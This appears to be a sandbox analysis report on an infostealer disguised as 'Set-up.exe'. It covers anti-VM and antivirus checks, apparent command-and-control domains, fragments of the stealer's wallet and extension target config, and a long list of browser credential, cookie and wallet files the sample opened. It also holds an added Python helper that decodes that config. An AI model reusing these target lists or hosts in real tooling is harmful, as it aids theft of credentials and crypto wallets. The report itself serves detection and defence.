Source: unknown | HTTPS traffic detected: 172.67.139.144:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.139.144:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.139.144:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.139.144:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.139.144:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.139.144:443 -> 192.168.2.4:49745 version: TLS 1.2

              System Summary

              Source: 00000000.00000002.1910418761.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 (Author: unknown, os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13)
              Source: Set-up.exe | Static PE information: invalid certificate
              Source: Set-up.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
              Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
              Source: Set-up.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\Set-up.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: Set-up.exe, 00000000.00000003.1782955917.0000000003F05000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: Set-up.exe | Virustotal: Detection: 7%
              Source: Set-up.exe | ReversingLabs: Detection: 13%
              Source: Set-up.exe | String found in binary or memory: -h, --help display this help and exit (two occurrences)
              Source: C:\Users\user\Desktop\Set-up.exe | File read: C:\Users\user\Desktop\Set-up.exe
              Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: wininet.dll
              Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: mscoree.dll
              Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: wldp.dll
              Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: winhttp.dll
              Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: ondemandconnroutehelper.dll (loaded 8 times)
              Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: webio.dll
              Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: mswsock.dll
              Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: iphlpapi.dll
              Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: winnsi.dll
              Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: sspicli.dll
              Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: dnsapi.dll
              Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: rasadhlp.dll
              Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: fwpuclnt.dll
              Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: schannel.dll
              Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: mskeyprotect.dll
              Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: ntasn1.dll
              Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: ncrypt.dll
              Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: ncryptsslp.dll
              Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: msasn1.dll
              Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: cryptsp.dll
              Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: rsaenh.dll
              Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: gpapi.dll
              Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: dpapi.dll
              Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: wbemcomn.dll
              Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: amsi.dll
              Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: userenv.dll
              Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: profapi.dll
              Source: C:\Users\user\Desktop\Set-up.exe | Section loaded: version.dll
              Source: Set-up.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
              Source: Set-up.exe | Static file information: File size 73935792 > 1048576
              Source: Set-up.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x2c9600
              Source: C:\Users\user\Desktop\Set-up.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
              Source: C:\Users\user\Desktop\Set-up.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
              Source: C:\Users\user\Desktop\Set-up.exe | Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\Set-up.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\Set-up.exe | System information queried: FirmwareTableInformation
              Source: C:\Users\user\Desktop\Set-up.exe TID: 6456 | Thread sleep time: -150000s >= -30000s
              Source: C:\Users\user\Desktop\Set-up.exe TID: 2188 | Thread sleep time: -30000s >= -30000s
              Source: C:\Users\user\Desktop\Set-up.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: Set-up.exe, 00000000.00000002.1910542741.0000000000D43000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1910542741.0000000000D78000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
              Source: C:\Users\user\Desktop\Set-up.exe | Process information queried: ProcessInformation

              HIPS / PFW / Operating System Protection Evasion

              Source: Set-up.exe, 00000000.00000002.1910418761.0000000000B60000.00000040.10000000.00040000.00000000.sdmp | String found in binary or memory: truculengisau.biz
              Source: Set-up.exe, 00000000.00000002.1910418761.0000000000B60000.00000040.10000000.00040000.00000000.sdmp | String found in binary or memory: spookycappy.biz
              Source: Set-up.exe, 00000000.00000002.1910418761.0000000000B60000.00000040.10000000.00040000.00000000.sdmp | String found in binary or memory: punishzement.biz
              Source: Set-up.exe, 00000000.00000002.1910418761.0000000000B60000.00000040.10000000.00040000.00000000.sdmp | String found in binary or memory: nuttyshopr.biz
              Source: Set-up.exe, 00000000.00000002.1910418761.0000000000B60000.00000040.10000000.00040000.00000000.sdmp | String found in binary or memory: marketlumpe.biz
              Source: Set-up.exe, 00000000.00000002.1910418761.0000000000B60000.00000040.10000000.00040000.00000000.sdmp | String found in binary or memory: littlenotii.biz
              Source: Set-up.exe, 00000000.00000002.1910418761.0000000000B60000.00000040.10000000.00040000.00000000.sdmp | String found in binary or memory: grandiouseziu.biz
              Source: Set-up.exe, 00000000.00000002.1910418761.0000000000B60000.00000040.10000000.00040000.00000000.sdmp | String found in binary or memory: fraggielek.biz
              Source: Set-up.exe, 00000000.00000002.1910418761.0000000000B60000.00000040.10000000.00040000.00000000.sdmp | String found in binary or memory: rampnatleadk.click
              Source: C:\Users\user\Desktop\Set-up.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\Set-up.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: Set-up.exe, 00000000.00000003.1857255847.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\Set-up.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              Source: Yara match | File source: Process Memory Space: Set-up.exe PID: 7104, type: MEMORYSTR
              Source: Yara match | File source: sslproxydump.pcap, type: PCAP
              Source: Set-up.exe, 00000000.00000003.1851921420.0000000000DD6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: t":0,"p":"%appdata%\\Electrum\\wallets","m":["*"],"z":"Wallets/Electrum","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":["*"],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p"ce
              Source: Set-up.exe, 00000000.00000002.1910770861.0000000000DD6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ta%\\ElectronCash\\wallets","m":["*"],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Guarda\\IndexedDB","m":["*"],"z":"Wallets/Guarda","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\DashCFe
              Source: Set-up.exe, 00000000.00000002.1910770861.0000000000DD6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: afln","ez":"Guarda"},{"en":"blnieiiffboillknjnepogjhkgnoapac","ez":"EQUA"},{"en":"cjelfplplebdjjenllpjcblmjkfcffne","ez":"Jaxx Liberty"},{"en":"fihkakfobkmkjojpchpfgcmhfjnmnfpi","ez":"BitApp"},{"en":"kncchdig
              Source: Set-up.exe, 00000000.00000003.1841233829.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ExodusWeb3
              Source: Set-up.exe, 00000000.00000003.1841233829.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: Set-up.exe, 00000000.00000003.1841233829.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: keystore
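              The JSON fragments in the memory strings above are the stealer's target list: one array of file-grab rules (path template, file masks, archive folder, depth, size cap) and one array of browser-extension ids with labels. The following is an added analyst helper, not code from the report or from the malware, that re-assembles the complete entries visible above into valid JSON, expands the %appdata% placeholders, and matches the extension ids against the "File opened" paths the sandbox recorded. The field meanings (t, p, m, z, d, fs, en, ez), the profile paths in ENV, and the subset of observed paths are assumptions or constructed sample data; entries the report shows truncated are left out rather than guessed.

```python
import json
import re

# Constructed sample, not copied verbatim from the report: the complete
# entries visible in the memory-string fragments, re-assembled as valid JSON.
FILE_TARGETS_JSON = r"""[
  {"t":0,"p":"%appdata%\\Electrum\\wallets","m":["*"],"z":"Wallets/Electrum","d":0,"fs":20971520},
  {"t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":["*"],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},
  {"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":["*"],"z":"Wallets/ElectronCash","d":0,"fs":20971520},
  {"t":0,"p":"%appdata%\\Guarda\\IndexedDB","m":["*"],"z":"Wallets/Guarda","d":2,"fs":20971520}
]"""

EXTENSION_TARGETS_JSON = r"""[
  {"en":"blnieiiffboillknjnepogjhkgnoapac","ez":"EQUA"},
  {"en":"cjelfplplebdjjenllpjcblmjkfcffne","ez":"Jaxx Liberty"},
  {"en":"fihkakfobkmkjojpchpfgcmhfjnmnfpi","ez":"BitApp"}
]"""

# Assumed field meanings (the report does not document them):
#   t = target type, p = directory with %VAR% placeholders, m = file masks,
#   z = folder inside the exfiltration archive, d = recursion depth,
#   fs = per-file size cap in bytes, en/ez = browser extension id and label.

# Constructed profile paths for the sandbox user seen in the report.
ENV = {
    "appdata": r"C:\Users\user\AppData\Roaming",
    "localappdata": r"C:\Users\user\AppData\Local",
}

PLACEHOLDER_RE = re.compile(r"%([A-Za-z_]+)%")
EXT_ID_RE = re.compile(r"\\(?:Local|Sync) Extension Settings\\([a-p]+)$")


def expand_path(template, env=ENV):
    """Expand %appdata%-style placeholders; unknown names are left intact."""
    return PLACEHOLDER_RE.sub(lambda m: env.get(m.group(1).lower(), m.group(0)), template)


def file_targets(config_json, env=ENV):
    """Decode the file-grab entries into concrete collection rules."""
    rules = []
    for entry in json.loads(config_json):
        rules.append({
            "path": expand_path(entry["p"], env),
            "masks": entry["m"],
            "archive_dir": entry["z"],
            "depth": entry["d"],
            "max_bytes": entry["fs"],
        })
    return rules


def extension_names(config_json):
    """Map extension id -> label for the browser-extension targets."""
    return {entry["en"]: entry["ez"] for entry in json.loads(config_json)}


def correlate(opened_paths, names):
    """For each opened path that is a Chrome extension store, return
    (extension id, label from the config) or (id, None) when the config
    fragment visible in the report does not list that id."""
    hits = []
    for path in opened_paths:
        m = EXT_ID_RE.search(path)
        if m:
            hits.append((m.group(1), names.get(m.group(1))))
    return hits


# Subset of the report's "File opened" paths, copied as observed.
OBSERVED = [
    r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data",
    r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi",
    r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne",
    r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac",
    r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn",
]

if __name__ == "__main__":
    for rule in file_targets(FILE_TARGETS_JSON):
        print(rule)
    for ext_id, label in correlate(OBSERVED, extension_names(EXTENSION_TARGETS_JSON)):
        print(ext_id, label or "(not in the visible config fragment)")
```

              Running it prints the expanded wallet directories the stealer would walk (with depth and per-file cap) and, for each extension store the sample opened, the wallet name the config assigns to that id; ids such as nkbihfbeogaeaoehlefnkodbefgpgknn resolve to None only because the matching config entry is not among the fragments the report shows, not because the sample ignored them.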
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
